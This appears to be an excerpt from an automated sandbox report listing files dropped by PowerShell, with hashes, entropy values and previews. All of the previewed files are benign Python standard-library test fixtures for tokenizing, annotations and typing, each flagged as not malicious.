                                                                                                                                                                                                              Size (bytes):32
                                                                                                                                                                                                              Entropy (8bit):4.625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:jQlqwWVMovn:slqCov
                                                                                                                                                                                                              MD5:063F96B8555C5129E16DB14E15071448
                                                                                                                                                                                                              SHA1:4637CD84139F505B3F63A2F0A2B9B8CC91EFBF74
                                                                                                                                                                                                              SHA-256:6EE3A4A2518FFADE55228D27FEECD9BB891CE973FDA8DA510E4A7BD2EBC476CA
                                                                                                                                                                                                              SHA-512:E27A19E4A6F93C03FD5C55004CBF615EADD86BAD5DADDBDF965C9212C91388B73778FF74B534BB127B4308109FCC54D5958E1A8401B3B6030977BF3CBAC6529C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.#coding: utf8..print('.')..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34
                                                                                                                                                                                                              Entropy (8bit):4.113362385992581
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:SyIFGaMIQlAyIUkXov:SbFGaMtlAyii
                                                                                                                                                                                                              MD5:72E39EB3810F6BF7EA13DE4F9875EC57
                                                                                                                                                                                                              SHA1:884CCA7C2F88639144B02546C83370F2664D0E02
                                                                                                                                                                                                              SHA-256:53AD4D723BE19E3FE2A9E4D14E7D4D74A21DA1418864D9F464CB4FC29772A46F
                                                                                                                                                                                                              SHA-512:3E86D859B8C9EC56EADFFDFA788826D356B0710A3D22014B6E22635B435E22FA0D0AE1E5B391F46EA05F91D8FC6C285BD7992BB8C4E863A168603856F5EDFEAB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-... = 2..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22
                                                                                                                                                                                                              Entropy (8bit):3.5503407095463877
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:sBwn:Jn
                                                                                                                                                                                                              MD5:8CEA5AFC2E5FC2C2ECF0872B40C7DCE3
                                                                                                                                                                                                              SHA1:908E189B914DB686B5EEEAC65CFFB49E189E4124
                                                                                                                                                                                                              SHA-256:798AAE7206B2A921C09F0754F215D0D809180F08413F87D77F82908EDA01968C
                                                                                                                                                                                                              SHA-512:3D725A4FE2FA3C8978D17F9C437945C46698E0AD979F750C5D331C5AA8E4105371585F6A452A200897E12BCA7D664BA2C6DA4CE9F77A57755D18CD6F48C6604A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#coding:latin1........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):456
                                                                                                                                                                                                              Entropy (8bit):4.92632828823683
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:22DASu/khlHYTFi/WLaFyXd6whDh9QzSIypFWsdU:TmeSQ/41n9nIypJe
                                                                                                                                                                                                              MD5:2D393339C41B997146938349AD906374
                                                                                                                                                                                                              SHA1:FB819F7D4265D62569F6C755B5F83B542C92B5F6
                                                                                                                                                                                                              SHA-256:DA6136F1F6D227E30B9D741B059AB7E44BF78E5A851C8A37BD7F9904E5063756
                                                                                                                                                                                                              SHA-512:8E8AB7C6A3DFCF3ADD9D1CEE5C5EA1948FF905366237384440C91F171E9412C55F2D6E64EDCA4B611471DA0B9040000943C79EE2D078648D087C3A937173D23F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.# -*- coding: latin1 -*-..# IMPORTANT: this file has the utf-8 BOM signature '\xef\xbb\xbf'..# at the start of it. Make sure this is preserved if any changes..# are made! Also note that the coding cookie above conflicts with..# the presence of a utf-8 BOM signature -- this is intended.....# Arbitrary encoded utf-8 text (stolen from test_doctest2.py)...x = '.....'..def y():.. """.. And again in a comment. ....... """.. pass..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):313
                                                                                                                                                                                                              Entropy (8bit):4.960476443302122
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Ssf/kUkCAJHH4OrJOFi/WLaF+p85LGpFcjpOpgOEsjKK3FiNv:S+/khlHYTFi/WLaFhypFWsdU
                                                                                                                                                                                                              MD5:72F0C10353850C92FD5460153F7C2688
                                                                                                                                                                                                              SHA1:7F4B94EF324C1F686D257973F3D513C2B36F2BCF
                                                                                                                                                                                                              SHA-256:B8CAA98AECFD4114BB31818D9AB55E2F067899BAE8C493D49D0C0A5507298455
                                                                                                                                                                                                              SHA-512:8C6FE6F837F30C2A74F02518E5AA7744763736F9698137231B6329D7647F1BF2B3474E4326F69CC622296D757307BAFF8BD80B35C7F4F1D2176044146025E1A4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.# IMPORTANT: this file has the utf-8 BOM signature '\xef\xbb\xbf'..# at the start of it. Make sure this is preserved if any changes..# are made!....# Arbitrary encoded utf-8 text (stolen from test_doctest2.py)...x = '.....'..def y():.. """.. And again in a comment. ....... """.. pass..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):434
                                                                                                                                                                                                              Entropy (8bit):4.927793079567334
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:icKytuw7zFu3bhlHGs4owOvSCuWLBEEypFWsdU:lR/70gs4olSCuo9ypJe
                                                                                                                                                                                                              MD5:D32A6B30BE39AB7165B79E8FF28F8353
                                                                                                                                                                                                              SHA1:585EC4E47AE63E4633BF59115F6664DF3DACEE63
                                                                                                                                                                                                              SHA-256:CFF7678394E58518901EBD65C066AC988666BFAF3152A0264DB014A79F6EB609
                                                                                                                                                                                                              SHA-512:05964C38338496FCE4AB9A9A36132273DAE997BEC64D81C23E30A91E39FF3C347846C67A03C1581DAFE87FCC4B3FF5448440858C42C2E7051130595723F33092
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..# IMPORTANT: unlike the other test_tokenize-*.txt files, this file..# does NOT have the utf-8 BOM signature '\xef\xbb\xbf' at the start..# of it. Make sure this is not added inadvertently by your editor..# if any changes are made to this file!....# Arbitrary encoded utf-8 text (stolen from test_doctest2.py)...x = '.....'..def y():.. """.. And again in a comment. ....... """.. pass..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                                                              Entropy (8bit):5.001120191868995
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:2zaMtlAytcf/kUkCAJHH4OrJOFi/WLaF+p85LGpFcjpOpgOEsjKK3FiNv:22cKytu/khlHYTFi/WLaFhypFWsdU
                                                                                                                                                                                                              MD5:8FA2BD60E630510363DEAEAB1995BE8B
                                                                                                                                                                                                              SHA1:385992E04FA9AB71A4EA13F750C6CC389BEA82BC
                                                                                                                                                                                                              SHA-256:0A8C335C24E07D747D8658C5441AA0BDC0A41C4ED7690F083AB7CBE3817EFEE8
                                                                                                                                                                                                              SHA-512:B277E2DB9D9A1237EFF9E1B5ADD66F30AC6740C4805949B1E339B88FB64EE148FCCCCD7530278C9C7BA5B6B12DB480453182452CFE82CB9810B95D2FDAB16F26
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.# -*- coding: utf-8 -*-..# IMPORTANT: this file has the utf-8 BOM signature '\xef\xbb\xbf'..# at the start of it. Make sure this is preserved if any changes..# are made!....# Arbitrary encoded utf-8 text (stolen from test_doctest2.py)...x = '.....'..def y():.. """.. And again in a comment. ....... """.. pass..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2906
                                                                                                                                                                                                              Entropy (8bit):5.125140740621929
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:3CfAUSJr6fe15wbmjX+uijo0jhRgUraLckD3UaKq:zQK5wbEpi4UOLckbFKq
                                                                                                                                                                                                              MD5:52FFABE38CF008B2C5821EDC45C326F2
                                                                                                                                                                                                              SHA1:DC6A0DAD696850EE63645DEA780778174A77D0A6
                                                                                                                                                                                                              SHA-256:15F3EEC6D2BD365DAA8224C5BA9A6DBEF00D8EF1CE5F2D8FF60A057492EDA4E0
                                                                                                                                                                                                              SHA-512:341E3D1D7B5E0732DD4A810CCFF25C2713521734C9008C72290B80AEECEBCDE5615D43A3A6874EC15869D9E511A1109A23855D337C5AD12E5146DEBE3533BA50
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Tests for the 'tokenize' module...# Large bits stolen from test_grammar.py.....# Comments.."#"..#'..#"..#\.. #.. # abc..'''#..#'''....x = 1 #....# Balancing continuation....a = (3, 4,.. 5, 6)..y = [3, 4,.. 5]..z = {'a':5,.. 'b':6}..x = (len(repr(y)) + 5*x - a[.. 3 ].. - x + len({.. }.. ).. )....# Backslash means line continuation:..x = 1 \..+ 1....# Backslash does not means continuation in comments :\..x = 0....# Ordinary integers..0xff != 255..0o377 != 255..2147483647 != 0o17777777777..-2147483647-1 != 0o20000000000..0o37777777777 != -1..0xffffffff != -1; 0o37777777777 != -1; -0o1234567 == 0O001234567; 0b10101 == 0B00010101....# Long integers..x = 0..x = 0..x = 0xffffffffffffffff..x = 0xffffffffffffffff..x = 0o77777777777777777..x = 0B11101010111111111..x = 123456789012345678901234567890..x = 123456789012345678901234567890....# Floating-point numbers..x = 3.14..x = 314...x = 0.314..# XXX x = 000.314..x = .314..x = 3e14..x = 3E14..x = 3e-14..x = 3e+14..x = 3.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                              Entropy (8bit):4.317528878926516
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:7vvlGtMiFIaQE30rzR7rArAeO/wRFxdvRzKTaZDvaMxRSSKBQXFbKBi9oNEOFUFS:jvlG+CQsQ7Urmw3zVDHXYBi9azeMLUSP
                                                                                                                                                                                                              MD5:E8210ADD754B9EEF271ADF9B115D7B10
                                                                                                                                                                                                              SHA1:B003FB4B9C849FBAE3168D4525743C22103298D2
                                                                                                                                                                                                              SHA-256:0F99F12A7ED87BB2787C247F360EE2FEBCD6077738179A31E631881C6010D50B
                                                                                                                                                                                                              SHA-512:BD23B06401D91AF78A88D1C9D2BA6D2626103962A19F04C5C1C5A9DB15E7AF0EFDA8556482AD6A66F210EA3CB0371EE941C3BFA63D23BCA2E7998D867B0671E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""This package contains modules that help testing the trace.py module. Note..that the exact location of functions in these modules is important, as trace.py..takes the real line numbers into account..."""..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):152
                                                                                                                                                                                                              Entropy (8bit):3.8402539129389353
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:HryOOFFFQ+90avzZKXAlWKmnTFmy+3NYG:LrqFFQHkzZeA3mnTFpnG
                                                                                                                                                                                                              MD5:4BEFC036F48A725B2DA5FC0062E80A73
                                                                                                                                                                                                              SHA1:6A9DFF2A3D2D0D0A05F4AB2CA7A818687F6B1A5E
                                                                                                                                                                                                              SHA-256:54F28FFDB62AE3E792FAE4C3347974173E2FF2CA9F1345DE7BFFDDC12209EF79
                                                                                                                                                                                                              SHA-512:7A40C1BF8EAD70B78988D69F3B083E2BEC2A679D0493BC4864968435F48A819EB6E20FEB96C9D335AB37FC899CA44CFC0F83C62B3806BD8CD0EECDB942DC1093
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:def func(x):.. b = x + 1.. return b + 2....def func2():.. """Test function for issue 9936 """.. return (1,.. 2,.. 3)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):889
                                                                                                                                                                                                              Entropy (8bit):4.8095350254957685
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:wHl5+j5aAcQON3BQC7SHnh9XglgMA/phWOjMnKCdepRjPREYBPCC0wLFTP3+DVZH:wHl8jwLN3BuHDa2ZMOpRjCuxTPc8ieKP
                                                                                                                                                                                                              MD5:AC0A4902EFCFE6DA4A115DA6CC4A3B6D
                                                                                                                                                                                                              SHA1:DEB3ACAC421BE3CD08EFA11D20060EDDA8492BD4
                                                                                                                                                                                                              SHA-256:0AA920B31C54CC983B988BC17F9A3973A1716EF1B456A606603FA440C36DCB17
                                                                                                                                                                                                              SHA-512:FC10E5C44F098F111A3F9A6B0A3309B574319CBD883617BA058E456E9F84BCEB33DEE322715EEACE9606755F9D505C8CF7A6FF4ECAF045675B94D0B2359849D5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Used to test `get_type_hints()` on a cross-module inherited `TypedDict` class....This script uses future annotations to postpone a type that won't be available..on the module inheriting from to `Foo`. The subclass in the other module should..look something like this:.... class Bar(_typed_dict_helper.Foo, total=False):.. b: int....In addition, it uses multiple levels of Annotated to test the interaction..between the __future__ import, Annotated, and Required..."""....from __future__ import annotations....from typing import Annotated, Generic, Optional, Required, TypedDict, TypeVar......OptionalIntType = Optional[int]....class Foo(TypedDict):.. a: OptionalIntType....T = TypeVar("T")....class FooGeneric(TypedDict, Generic[T]):.. a: Optional[T]....class VeryAnnotated(TypedDict, total=False):.. a: Annotated[Annotated[Annotated[Required[int], "a"], "b"], "c"]..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1182
                                                                                                                                                                                                              Entropy (8bit):4.811485397531734
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:NmtFsFVCFUZHjee4CD047FEvZvKwKOKAhAljt0tBft/txA4u7z6ds5Z0o+1:NmtSuUZHjee4qD7FcZvKwKB6Uqrfxta8
                                                                                                                                                                                                              MD5:3D66E2BC5D2FD06A44010806C3C53F3C
                                                                                                                                                                                                              SHA1:E154BFC4D9C68C187121A8A5FC13D5E91481DFE2
                                                                                                                                                                                                              SHA-256:FB9CB013599B4C737F4367C13E4AB9928AE5DD65880D129461B8B6989B2CDE06
                                                                                                                                                                                                              SHA-512:0AC422579C3318B9F33232E210C73B564AF45DEC87EF2A50B81528383895CF3C0E41E98541CCF221A748282E4CC0ACD33F6A358AA96942FBF9FE0DC1D05F943D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...."""..The module for testing variable annotations...Empty lines above are for good reason (testing for correct line numbers).."""....from typing import Optional..from functools import wraps....__annotations__[1] = 2....class C:.... x = 5; y: Optional['C'] = None....from typing import Tuple..x: int = 5; y: str = x; f: Tuple[int, int]....class M(type):.... __annotations__['123'] = 123.. o: type = object....(pars): bool = True....class D(C):.. j: str = 'hi'; k: str= 'bye'....from types import new_class..h_class = new_class('H', (C,))..j_class = new_class('J')....class F():.. z: int = 5.. def __init__(self, x):.. pass....class Y(F):.. def __init__(self):.. super(F, self).__init__(123)....class Meta(type):.. def __new__(meta, name, bases, namespace):.. return super().__new__(meta, name, bases, namespace)....class S(metaclass = Meta):.. x: str = 'something'.. y: str = 'something else'....def foo(x: int = 10):.. def bar(y: List[str]):..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):555
                                                                                                                                                                                                              Entropy (8bit):4.802433485626489
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:PN6cHSrgREYBba3+ZivnFDdM9oNeXiFbD1AxQeFeY8dsormNAHtEN0+aL:FzyrgCLc9oVbJAx1el+E8ANEw
                                                                                                                                                                                                              MD5:10842BA0DCD778A924C8F74A16FC5C47
                                                                                                                                                                                                              SHA1:0CFFD385DE17878D1173C2B99B95FD78BD478E39
                                                                                                                                                                                                              SHA-256:315DCEAE2EA3D0E7631ADE63E0FFC01BD7ABAF5B0836144B2E225B85092261AF
                                                                                                                                                                                                              SHA-512:18C0FDB2059DE5B581472DB92E9D25F7A76F60F9305A279288AA8779825AFE7379617E17318F828352C4A5A83D8668A2233B8A6038EBEE8BD9A4AFCC9513C21B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""..Some correct syntax for variable annotation here...More examples are in test_grammar and test_parser..."""....from typing import no_type_check, ClassVar....i: int = 1..j: int..x: float = i/10....def f():.. class C: ..... return C()....f().new_attr: object = object()....class C:.. def __init__(self, x: int) -> None:.. self.x = x....c = C(5)..c.new_attr: int = 10....__annotations__ = {}......@no_type_check..class NTC:.. def meth(self, param: complex) -> None:.. .......class CV:.. var: ClassVar['CV']....CV.var = CV()..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):466
                                                                                                                                                                                                              Entropy (8bit):4.624962209629425
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:TNssfRvjHSrHxxu1AnfdqLLmS5irc1AkwYHcYa:5sspvjyrHaAf0iIAPqcF
                                                                                                                                                                                                              MD5:12AEF11108F40668F254F7FCDA1BA7D6
                                                                                                                                                                                                              SHA1:EB77F51E93BA9C6360059C8F5367962BAD7B4DCA
                                                                                                                                                                                                              SHA-256:E8E95AAAB3F92E638482193779F0DEC543B1A8BE2203BE48370809E5BE441D6E
                                                                                                                                                                                                              SHA-512:E3D50ED23F04582825D4F2B7822FDAB656E0477D0D13863A40C1539468542FFF7D177E45117B7E2265AE0E578D426E25CFD3D9167DD59E3F01851A3BEC16ED9B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""..Correct syntax for variable annotation that should fail at runtime..in a certain manner. More examples are in test_grammar and test_parser..."""....def f_bad_ann():.. __annotations__[1] = 2....class C_OK:.. def __init__(self, x: int) -> None:.. self.x: no_such_name = x # This one is OK as proposed by Guido....class D_bad_ann:.. def __init__(self, x: int) -> None:.. sfel.y: int = 0....def g_bad_ann():.. no_such_name.attr: int = 0..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                              Entropy (8bit):4.5659457207557965
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:SbFojbdUXQ2RSQjNvyG3H+RIOv:SbFo2g2RSS9b3u
                                                                                                                                                                                                              MD5:7CBFB25032C9842095593139C3397F82
                                                                                                                                                                                                              SHA1:34E973CDB06C6C676B466F4337E2B2E4CC7FB46B
                                                                                                                                                                                                              SHA-256:F9D409614671050377E72A2EBA86D1A4CB450EBFA81DB5ED0359B92DEE021505
                                                                                                                                                                                                              SHA-512:7E1E5FFBC480A9F48EEAA4A87C9E7EF561EF36880A9DD8FC4B19261ABB45632A6686B6558BB37044F0303555DC35B332C2F1175BEE2A2D1F6A973795CF629D11
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# This ann_module isn't for test_typing,..# it's for test_module....a:int=3..b:str=4..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):212
                                                                                                                                                                                                              Entropy (8bit):4.705103321424055
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Sjc2PCeZzKTRMABJFREYByovith0P2Wyf6Fb:MCeZsRjPREYButhmo2b
                                                                                                                                                                                                              MD5:505D07DCD0BA5E313826F59F06DC8F7F
                                                                                                                                                                                                              SHA1:272AA1FC4FAD9BEF6F9CC6BFBE813B2082689485
                                                                                                                                                                                                              SHA-256:FBFD530CBE90DE4CBF028E856E9223D9689D213D2580903E231273D8FE8D294F
                                                                                                                                                                                                              SHA-512:86CAD147E7D8D0F75412B1FFED913C1A460DBABAF677E0FAA3CE7E8BDF630AC7C8E19771E8BD8291B82DDC67F8571EFE94723FE290AE5258A96E72EE88F06557
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Used by test_typing to verify that Final wrapped in ForwardRef works.....from __future__ import annotations....from typing import Final....name: Final[str] = "final"....class MyClass:.. value: Final = 3000..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):145
                                                                                                                                                                                                              Entropy (8bit):4.523379892283055
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:SWFrsnkEz+2CiSABowvLJ66MRm6NKXRZiq7JREvgB4EV+yyXfJEV+RIoUy:SJnka+2Lt1RMABJFREYBJV+yyXfJs+ay
                                                                                                                                                                                                              MD5:FA570448C64D13B8C6D89F99BE455C03
                                                                                                                                                                                                              SHA1:B213F4E6AA269E4B6149514F3A22A6010EC84203
                                                                                                                                                                                                              SHA-256:CDAB6365C850DC2B300A7E64B971D674E42B9CC111CAAB43EA9C2E6EE7E7CE8C
                                                                                                                                                                                                              SHA-512:9593547C56D8489516814A2EAC12D65E79804EFAAB5C2FE099ECB049E989DAE448275FB39FBE6D3FD491F73EDF8498BB38CB63A9BA698CA11976508509CCE57D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Tests that top-level ClassVar is not allowed....from __future__ import annotations....from typing import ClassVar....wrong: ClassVar[int] = 1..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):306
                                                                                                                                                                                                              Entropy (8bit):5.076817140974328
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:SzECz6Rcu5RCAjfRMABJ03adeGJIzmeMadepS+mFIQfatGgRwgQNv:OTz6qu59fRjW3a8H+WIQStGgRjc
                                                                                                                                                                                                              MD5:6ADBB2112FA212BE6A3B77855FCF9E31
                                                                                                                                                                                                              SHA1:D67F98749CF9D08D7A2A0EC2B4AAE200AB5B2B73
                                                                                                                                                                                                              SHA-256:C4C03C8FA2051EB3F8C150B953679B66EDAE0610A8EE5E70F1B2E982FBE5F173
                                                                                                                                                                                                              SHA-512:28C4116FC5514B9470052549D3A0AD026A64D006F29DB0D4F3814CBF426BD5A6D0AEDC16B8F3125EC6F3DCE7A3FBA904D7E99019B4FC680C15F45E5DE7A21D0C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Tests class have ``__text_signature__``....from __future__ import annotations....DEFAULT_BUFFER_SIZE = 8192....class BufferedReader(object):.. """BufferedReader(raw, buffer_size=DEFAULT_BUFFER_SIZE)\n--\n\n.. Create a new buffered reader using the given readable raw IO object... """.. pass..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                              Entropy (8bit):4.858241189436596
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:SFjhRcq6GNjOzvgDRVYaVrFRvyeeQQ5aYWHMwDIZRD+0KhhKROWv:SFjHFyzoNVYaVXaeKUYWHMOIzO6RRv
                                                                                                                                                                                                              MD5:D6F5AEB2E62E0302E19F6557440A37FF
                                                                                                                                                                                                              SHA1:10642D54C58DE73285420842D68B16EED291C72E
                                                                                                                                                                                                              SHA-256:6BEA093BDE02E09E5EE369AF57BCE2E7AA1C2DF7BB6931D79D0DB8CB5322EE8E
                                                                                                                                                                                                              SHA-512:972CF92253344A3F610B1EC5FC81D0FD221166994EB5D2CC97A70508CE785BA92D4305606DACF0411756E203E193836A36213B2D9083E29677AA9C24DC9093D1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Test `@no_type_check`,..# see https://bugs.python.org/issue46571....class NoTypeCheck_Outer:.. class Inner:.. x: int......def NoTypeCheck_function(arg: int) -> int:.. .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):294
                                                                                                                                                                                                              Entropy (8bit):4.990638141351612
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:SFomCf3f2wRNuxz2H4AZREYBG2LeKqbnStjq8ii0vL8SOfSFvRKbb4JE:Nn2EOz84AZREYBGKqbnsu89In5KbbEE
                                                                                                                                                                                                              MD5:100B126B69280D81C40195866F07880E
                                                                                                                                                                                                              SHA1:F431976ED0AB35D03669C1A2D2B9D399C85DDF2F
                                                                                                                                                                                                              SHA-256:95FD58DAB93A365BC7F22A70D8AAA0C7D93784AA96A24F3E525AE1256F40F543
                                                                                                                                                                                                              SHA-512:4567ED2D78F8FC48BC93C119DCA73B21131052BF7465287C4298A29FF08788C043ED9E74706120ABA789EE81C4D20CF68D5673E57C3314AC370D712CB4FA6110
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Test ``inspect.formatannotation``..# https://github.com/python/cpython/issues/96073....from typing import Union, List....ann = Union[List[str], int]....# mock typing._type_repr behaviour..class A: .......A.__module__ = 'testModule.typing'..A.__qualname__ = 'A'....ann1 = Union[List[A], int]..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):532
                                                                                                                                                                                                              Entropy (8bit):4.915092957034746
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:IaxJREYB9gKT/htHqwy8xMS1N3oAXROklve6/10:IarCuf/htHh2SX4GROklvP/10
                                                                                                                                                                                                              MD5:256201AEE4D323777A54C878D4F627CA
                                                                                                                                                                                                              SHA1:6819693FD6D8CB7A6A12CBAA956BE68A685FACD6
                                                                                                                                                                                                              SHA-256:E0DF2C34D77F595452B90C2B3863EC393255678941DD7707FF793722FA1552E3
                                                                                                                                                                                                              SHA-512:071BEED9214905C64DB24A5B7113690CF2F3ADE9B4D45D4C6A4A176D345DCF98136AB69C2BC3FF319AAF163FB68D5C8D33EBBDC326088F46F9889A9554D73BAE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Module for testing the behavior of generics across different modules."""....from typing import TypeVar, Generic, Optional, TypeAliasType....default_a: Optional['A'] = None..default_b: Optional['B'] = None....T = TypeVar('T')......class A(Generic[T]):.. some_b: 'B'......class B(Generic[T]):.. class A(Generic[T]):.. pass.... my_inner_a1: 'B.A'.. my_inner_a2: A.. my_outer_a: 'A' # unless somebody calls get_type_hints with localns=B.__dict__....type Alias = int..OldStyle = TypeAliasType("OldStyle", int)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1089263
                                                                                                                                                                                                              Entropy (8bit):7.990499524693109
